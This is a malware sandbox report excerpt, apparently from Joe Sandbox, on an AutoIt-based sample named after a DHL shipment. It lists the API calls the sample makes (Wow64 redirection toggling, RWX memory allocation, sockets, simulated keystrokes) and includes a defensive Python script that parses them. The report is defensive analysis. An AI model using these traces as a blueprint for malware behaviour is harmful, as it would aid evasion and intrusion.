                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                    • API String ID: 2574300362-3689287502
                                                                                    • Opcode ID: deb655d600360c3f7a64da00979abc24d226adc33927a12e377023cfc1b2c6e9
                                                                                    • Instruction ID: ec2017bce5123e05aede766060a41278e9f4078660307b72ffba6ca5475a4ddf
                                                                                    • Opcode Fuzzy Hash: deb655d600360c3f7a64da00979abc24d226adc33927a12e377023cfc1b2c6e9
                                                                                    • Instruction Fuzzy Hash: BAD0C230900713CFC7205F70D80864BBAD5FF09751F018C3A9492C2262E6B8C480C6A0
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00831039), ref: 00830DF5
                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00830E07
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                    • API String ID: 2574300362-4033151799
                                                                                    • Opcode ID: 9bf9f3defeb404c2bd469148566cb0eff7681c710edd7c479056ffea1ff91aeb
                                                                                    • Instruction ID: 4b61e7136a7beb96cf54a0f42e5be5d7b2f91bc675e7887125b364fd9076d0c3
                                                                                    • Opcode Fuzzy Hash: 9bf9f3defeb404c2bd469148566cb0eff7681c710edd7c479056ffea1ff91aeb
                                                                                    • Instruction Fuzzy Hash: F5D08230A00322CFC7218F72D80828A72E9FF80352F028C2ED592C22A0E6B4D8908A80
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00828CF4,?,0083F910), ref: 008290EE
                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00829100
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                    • API String ID: 2574300362-199464113
                                                                                    • Opcode ID: 74f13984873c1babd0e88769f6662aa7fce3e7ae072ffc653aff9f4924e170ef
                                                                                    • Instruction ID: 947e6f5f3d16a703cd1bc177b5c025c4758bd3b21e1e12e143fc0a0b5f41884a
                                                                                    • Opcode Fuzzy Hash: 74f13984873c1babd0e88769f6662aa7fce3e7ae072ffc653aff9f4924e170ef
                                                                                    • Instruction Fuzzy Hash: 5AD01274950723CFDB209F31E81850676D4FF55351F128C79D9D5D6650EA78C4C0CAD0
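Four of the records above show the same pattern: LoadLibraryA on kernel32.dll or advapi32.dll followed by GetProcAddress for an export that is absent on older Windows builds (Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, RegDeleteKeyExW, GetModuleHandleExW). That is how a 32-bit runtime reaches version-dependent APIs without a hard import, and the ">>>AUTOIT NO CMDEXECUTE<<<" string on the call stack is consistent with the AutoIt runtime doing this rather than with custom loader code; the Wow64 pair matters to an analyst because it lets a 32-bit process read the native System32 directory on 64-bit Windows. The Python below is an added example, not part of this report or of Joe Sandbox, that parses API lines in this layout, pairs each LoadLibraryA with the GetProcAddress calls that follow it in the same function, and flags RWX VirtualAlloc calls; the sample text is copied from the records on this page, while the regex, class and function names are this example's own assumptions.

```python
"""Triage helper for Joe Sandbox per-function 'APIs' records (added example, not Joe Sandbox code)."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Sample copied from the report records above; the record structure is the page's, not constructed.
SAMPLE = """\
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,007B4B83,?), ref: 007B4C44
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 007B4C56
Strings
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,007B4BD0,?,007B4DEF,?,008752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007B4C11
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 007B4C23
Strings
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,00831039), ref: 00830DF5
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00830E07
Strings
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000001,00828CF4,?,0083F910), ref: 008290EE
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00829100
Strings
APIs
• CharLowerBuffW.USER32(?,?), ref: 0082E0BE
• CharLowerBuffW.USER32(?,?), ref: 0082E101
  • Part of subcall function 0082D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0082D7C5
• VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0082E301
• _memmove.LIBCMT ref: 0082E314
Memory Dump Source
"""

# One API line: "<Api>.<Module>(<args>), ref: <addr>"; the argument list is optional
# (e.g. "_memmove.LIBCMT ref: ...") and a line may be marked as part of a subcall.
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: str                      # address of the call site inside the dump
    subcall_of: str | None = None  # set when the line came from a "Part of subcall function" entry


def parse_records(report_text: str) -> list[list[ApiCall]]:
    """Split the text into per-function records at each 'APIs' header and parse the call lines."""
    records: list[list[ApiCall]] = []
    current: list[ApiCall] | None = None
    for raw in report_text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = []
            records.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m is None:
            if line in ("Strings", "Memory Dump Source"):
                current = None  # next section header ends this record's API list
            continue
        args = [a for a in (m.group("args") or "").split(",") if a]
        current.append(ApiCall(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return records


def dynamic_imports(records: list[list[ApiCall]]) -> list[tuple[str | None, str, str]]:
    """Pair each direct LoadLibraryA/W with the GetProcAddress calls that follow it in the same function.

    Returns (dll, export, GetProcAddress call-site address). Subcall entries are ignored so a
    library loaded by a callee is not attributed to the caller's GetProcAddress.
    """
    pairs: list[tuple[str | None, str, str]] = []
    for calls in records:
        last_dll: str | None = None
        for c in calls:
            if c.subcall_of is not None:
                continue
            if c.api in ("LoadLibraryA", "LoadLibraryW") and c.args:
                last_dll = c.args[0].lower()
            elif c.api == "GetProcAddress" and len(c.args) >= 2:
                pairs.append((last_dll, c.args[1], c.ref))
    return pairs


def resolves_wow64_redirection(pairs: list[tuple[str | None, str, str]]) -> bool:
    """True when both halves of the FS-redirection toggle are resolved from kernel32."""
    exports = {e for d, e, _ in pairs if d == "kernel32.dll"}
    return {"Wow64DisableWow64FsRedirection", "Wow64RevertWow64FsRedirection"} <= exports


def rwx_allocations(records: list[list[ApiCall]]) -> list[str]:
    """Call sites of VirtualAlloc with flProtect == 0x40 (PAGE_EXECUTE_READWRITE)."""
    return [c.ref for calls in records for c in calls
            if c.api == "VirtualAlloc" and len(c.args) == 4 and c.args[3] == "00000040"]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for dll, export, ref in dynamic_imports(recs):
        print(f"{ref}: {dll} -> {export}")
    print("wow64 redirection toggle:", resolves_wow64_redirection(dynamic_imports(recs)))
    print("RWX VirtualAlloc at:", rwx_allocations(recs))
```

The pairing is positional (the GetProcAddress after the nearest LoadLibraryA in the same function), which is what these records support; a function that loads several libraries before resolving exports would need the hmodule argument tracked instead, and this report prints that argument as 00000000, so it cannot be used here.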
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: LocalTime__swprintf
                                                                                    • String ID: %.3d$WIN_XPe
                                                                                    • API String ID: 2070861257-2409531811
                                                                                    • Opcode ID: 69a34de66065504f8cfab66c09d8942c3a20605190ce02049acba1f54512378d
                                                                                    • Instruction ID: 17d46d07c0ead3a5b18f7ff32533ae75e0074c0ae979b65b9b6ffa1af0542816
                                                                                    • Opcode Fuzzy Hash: 69a34de66065504f8cfab66c09d8942c3a20605190ce02049acba1f54512378d
                                                                                    • Instruction Fuzzy Hash: A5D05B71C1410CFAC700A7909C88CF9737CB719311FA00462F60AD2240E23ED754D731
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 281cdd71a1360a6bb4a33f183637438ed73240f2bdf33c110cbd2b8b4de810a9
                                                                                    • Instruction ID: 669954d9531f5b1a18a7b0601893e7350250d4cce4581253142aa8fba86aa11e
                                                                                    • Opcode Fuzzy Hash: 281cdd71a1360a6bb4a33f183637438ed73240f2bdf33c110cbd2b8b4de810a9
                                                                                    • Instruction Fuzzy Hash: 1CC16D74E0421AEFDB54CFA4C884EAEBBB5FF48704B158598E805EB291D730ED81DB90
                                                                                    APIs
                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0082E0BE
                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0082E101
                                                                                      • Part of subcall function 0082D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0082D7C5
                                                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0082E301
                                                                                    • _memmove.LIBCMT ref: 0082E314
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 3659485706-0
                                                                                    • Opcode ID: 4fd5c24d5eafbce3e8a315dfab17695faa80cf346dd8653d377c8b2af07f0b4c
                                                                                    • Instruction ID: 15341e064315d2fa074f04cca66ebf328219f60ed513f3937b51d9e8eb730585
                                                                                    • Opcode Fuzzy Hash: 4fd5c24d5eafbce3e8a315dfab17695faa80cf346dd8653d377c8b2af07f0b4c
                                                                                    • Instruction Fuzzy Hash: DCC121716083119FC714DF28C484A6ABBE4FF89314F14896EF99ADB351D730E986CB82
                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 008280C3
                                                                                    • CoUninitialize.OLE32 ref: 008280CE
                                                                                      • Part of subcall function 0080D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0080D5D4
                                                                                    • VariantInit.OLEAUT32(?), ref: 008280D9
                                                                                    • VariantClear.OLEAUT32(?), ref: 008283AA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                    • String ID:
                                                                                    • API String ID: 780911581-0
                                                                                    • Opcode ID: e70744baf4d3b7b73893a4946bc714206db126c8f8e586729f3b72cb9afec688
                                                                                    • Instruction ID: c82228494254c1d41aecb2cf5797b16806b3ffc7e18160e6c5d979330dbaa223
                                                                                    • Opcode Fuzzy Hash: e70744baf4d3b7b73893a4946bc714206db126c8f8e586729f3b72cb9afec688
                                                                                    • Instruction Fuzzy Hash: 5BA11175604711DFCB00DF24D889B6AB7E4FF89314F048418FAA69B3A1CB34E844CB82
                                                                                    APIs
                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00842C7C,?), ref: 008076EA
                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00842C7C,?), ref: 00807702
                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,0083FB80,000000FF,?,00000000,00000800,00000000,?,00842C7C,?), ref: 00807727
                                                                                    • _memcmp.LIBCMT ref: 00807748
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 314563124-0
                                                                                    • Opcode ID: d362d7eaa23df1a88fe1422ae7778ddee53469a1bec89410a8291aac2efbe0c6
                                                                                    • Instruction ID: 505079c91bc8a558bc9077ef8d5823432d63e126ec21814cafea85aae595a69e
                                                                                    • Opcode Fuzzy Hash: d362d7eaa23df1a88fe1422ae7778ddee53469a1bec89410a8291aac2efbe0c6
                                                                                    • Instruction Fuzzy Hash: E781E975A00109EFCB44DFA4C984EEEB7B9FF89315F204558E516EB250DB71AE06CB60
APIs
Similarity
• API ID: Variant$AllocClearCopyInitString
• String ID:
• API String ID: 2808897238-0
• Opcode ID: 0081131ffb234a4995a21736f0b4fa7da1eb0b06172039561c9637d90cf5e74b
• Instruction ID: 8a3ecdbb81710c60452cc7a40c71dc231a106242c6c2da216ef118889ac7663e
• Opcode Fuzzy Hash: 0081131ffb234a4995a21736f0b4fa7da1eb0b06172039561c9637d90cf5e74b
• Instruction Fuzzy Hash: F351BE747003069ADBA0AF69DC95A6AB7E5FF45310F20D81FE696DB2D1EB34D8B08701
APIs
• GetWindowRect.USER32(012309F0,?), ref: 00839863
• ScreenToClient.USER32(00000002,00000002), ref: 00839896
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00839903
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
• Opcode ID: a802025a3deac725d7d86596b0dbbf89707a76843a3f18a8d4e259fad2e156ab
• Instruction ID: f3aa7b3caec0f7d88c8928ae4d5f56132bdf79b14b97ac559dbac2e534128bb4
• Opcode Fuzzy Hash: a802025a3deac725d7d86596b0dbbf89707a76843a3f18a8d4e259fad2e156ab
• Instruction Fuzzy Hash: 7B513D34A00209EFDB10DF68D884AAE7BB5FF95360F148569F995DB2A0D770ED81CB90
APIs
• SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00809AD2
• __itow.LIBCMT ref: 00809B03
  • Part of subcall function 00809D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00809DBE
• SendMessageW.USER32(?,0000110A,00000001,?), ref: 00809B6C
• __itow.LIBCMT ref: 00809BC3
Similarity
• API ID: MessageSend$__itow
• String ID:
• API String ID: 3379773720-0
• Opcode ID: 1be80c82ba5e92b968f4748d13fdc2722f5f2f9e775f2d7438386f3ab6636c62
• Instruction ID: 9a12bc16d3b2f874a2bc19dd8dfcded79b5cbc697a1a40fd4ebfa1064d9f794a
• Opcode Fuzzy Hash: 1be80c82ba5e92b968f4748d13fdc2722f5f2f9e775f2d7438386f3ab6636c62
• Instruction Fuzzy Hash: 08419070A00218ABDF15EF54DC5ABFE7FB9EF84724F000069F945A7292DB749A44CBA1
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 008269D1
• WSAGetLastError.WSOCK32(00000000), ref: 008269E1
  • Part of subcall function 007B9837: __itow.LIBCMT ref: 007B9862
  • Part of subcall function 007B9837: __swprintf.LIBCMT ref: 007B98AC
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00826A45
• WSAGetLastError.WSOCK32(00000000), ref: 00826A51
Similarity
• API ID: ErrorLast$__itow__swprintfsocket
• String ID:
• API String ID: 2214342067-0
• Opcode ID: 2823df0028d7d92051603e13a0203d447578d3aecdaeffb97e971fd904575f54
• Instruction ID: 46b48ef4b75dd94aff708b131efe3c664893890700b5d60cd76d733e5cf76e25
• Opcode Fuzzy Hash: 2823df0028d7d92051603e13a0203d447578d3aecdaeffb97e971fd904575f54
• Instruction Fuzzy Hash: 0A41A275740210AFEB60AF24DC8AF6A77A8EF45B14F048458FB29AB2D2DA749D408791
APIs
• #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0083F910), ref: 008264A7
• _strlen.LIBCMT ref: 008264D9
Similarity
• API ID: _strlen
• String ID:
• API String ID: 4218353326-0
• Opcode ID: 53d71419b81c36e6508710eb29d831d4db2ca6943bfc2705f9950f9291c12206
• Instruction ID: d408c1c2586a90fcb4e58e3d33d94e6eadbc952e230134ac630103cf666fc1e5
• Opcode Fuzzy Hash: 53d71419b81c36e6508710eb29d831d4db2ca6943bfc2705f9950f9291c12206
• Instruction Fuzzy Hash: 83419F71A00118ABCB14EBA8ED89FEEB7B9FF44310F148159F919D7292EB34AD50C751
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0081B89E
• GetLastError.KERNEL32(?,00000000), ref: 0081B8C4
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0081B8E9
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0081B915
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
• Opcode ID: 6405f6e06a7596c350149a27c99f038630f4872bf2545835f9891ff9cc7c540a
• Instruction ID: 5a7a3a5312314a17a788944722bb66ecd44f65237dff6ae13bd004ecf2271d24
• Opcode Fuzzy Hash: 6405f6e06a7596c350149a27c99f038630f4872bf2545835f9891ff9cc7c540a
• Instruction Fuzzy Hash: C341F735600610DFCB11EF15C488A99BBB5FF8A710F098098EE5A9B362CB34ED41CB91
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008388DE
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
• Opcode ID: dea4ea60b30fce3aac6e3a5e080fed3f42017e78a7a9c73a2d1bb6fe20143270
• Instruction ID: 12339afdbf23e6064e2082dad852f8a130eff8d31cb13276e655fe5cd5bd8af5
• Opcode Fuzzy Hash: dea4ea60b30fce3aac6e3a5e080fed3f42017e78a7a9c73a2d1bb6fe20143270
• Instruction Fuzzy Hash: 4131C674600308EFEF209A68CC45FB97BA5FBC5354F644521FE15E61A1CE71E94097D2
APIs
• ClientToScreen.USER32(?,?), ref: 0083AB60
• GetWindowRect.USER32(?,?), ref: 0083ABD6
• PtInRect.USER32(?,?,0083C014), ref: 0083ABE6
• MessageBeep.USER32(00000000), ref: 0083AC57
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
• Opcode ID: f6a19cd27f674b64e2fefdd33118a462d0059434d0d587ecb9759bf81f86f742
• Instruction ID: ef8c50c5eeefef8a64dc3818e899b082263e8b0e3d91ff4d1dd657e29f7881a4
• Opcode Fuzzy Hash: f6a19cd27f674b64e2fefdd33118a462d0059434d0d587ecb9759bf81f86f742
• Instruction Fuzzy Hash: 68418030A00119DFCF19DF58C884A59BBF5FF89310F1894A9E598DB265D731E842CBD2
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00810B27
• SetKeyboardState.USER32(00000080,?,00000001), ref: 00810B43
• PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00810BA9
• SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00810BFB
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: 561601583cfc08415537116d5c641b37baa6e6facf43d8058e82a6519a7c0281
• Instruction ID: 581f9cfcd563acd6e99b5d7f2d5bf6f4c913601c1145497838846ef795561e01
• Opcode Fuzzy Hash: 561601583cfc08415537116d5c641b37baa6e6facf43d8058e82a6519a7c0281
• Instruction Fuzzy Hash: 04312A70D48218AEFB308B658C05BF9BB6DFF45338F04425AE581D11D1C7F449C09B91
APIs
• GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00810C66
• SetKeyboardState.USER32(00000080,?,00008000), ref: 00810C82
• PostMessageW.USER32(00000000,00000101,00000000), ref: 00810CE1
• SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00810D33
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: 9def27d258edd527f6597765683be471b0f41c0de5cb0d6c5043b5b3a03e782d
• Instruction ID: d1ee7a18a662e08a40a1ef95a1aca1446b84faca56a273ddec09d405684dbd93
• Opcode Fuzzy Hash: 9def27d258edd527f6597765683be471b0f41c0de5cb0d6c5043b5b3a03e782d
• Instruction Fuzzy Hash: 6C311230900218AEFB308A689C05BFABB6EFF85310F14871AE580D21D1C7B599C58FD2
                                                                                    APIs
                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007E61FB
                                                                                    • __isleadbyte_l.LIBCMT ref: 007E6229
                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007E6257
                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007E628D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                    • String ID:
                                                                                    • API String ID: 3058430110-0
                                                                                    • Opcode ID: b2bc9c14ff337106e8417729608b346ac8108b323751499b6c49305007452216
                                                                                    • Instruction ID: 458c112f0853c6bd0a35c6ea3730cbb1ce2285f1a9f099a42a3ce3d8b1ab64a1
                                                                                    • Opcode Fuzzy Hash: b2bc9c14ff337106e8417729608b346ac8108b323751499b6c49305007452216
                                                                                    • Instruction Fuzzy Hash: E631D230605286EFDF228F76CC48BAA7FB9FF59390F154029E96487191E734E950D790
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32 ref: 00834F02
                                                                                      • Part of subcall function 00813641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0081365B
                                                                                      • Part of subcall function 00813641: GetCurrentThreadId.KERNEL32 ref: 00813662
                                                                                      • Part of subcall function 00813641: AttachThreadInput.USER32(00000000,?,00815005), ref: 00813669
                                                                                    • GetCaretPos.USER32(?), ref: 00834F13
                                                                                    • ClientToScreen.USER32(00000000,?), ref: 00834F4E
                                                                                    • GetForegroundWindow.USER32 ref: 00834F54
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                    • String ID:
                                                                                    • API String ID: 2759813231-0
                                                                                    • Opcode ID: 2b763167bf1b496299ce6068ca530eba0fb98d52207943fad0aa4a46b538a280
                                                                                    • Instruction ID: c213198ffc24296c1e3b59de4d34664fa77739531050a9a161d4b3e1c5586122
                                                                                    • Opcode Fuzzy Hash: 2b763167bf1b496299ce6068ca530eba0fb98d52207943fad0aa4a46b538a280
